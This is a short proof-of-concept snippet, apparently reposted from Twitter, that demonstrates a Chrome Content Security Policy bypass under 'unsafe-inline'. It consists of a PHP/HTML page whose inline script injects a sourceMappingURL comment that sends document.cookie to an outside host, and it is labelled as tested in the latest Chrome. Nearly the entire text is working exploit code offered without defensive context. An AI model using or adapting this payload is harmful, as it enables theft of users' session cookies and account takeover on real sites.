Chrome CSP bypass @长短短 (unsafe-inline)

From twitter @长短短

<?php
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';");
?>
<html>
<meta charset="utf-8">
<body>
<script>
document.write("<script>"+`ffff=1//# sourceMappingURL=http://nohackair.net/?${escape(document.cookie)}`+"<\/script>")
</script>
</body>
</html>

TESTED IN THE LATEST CHROME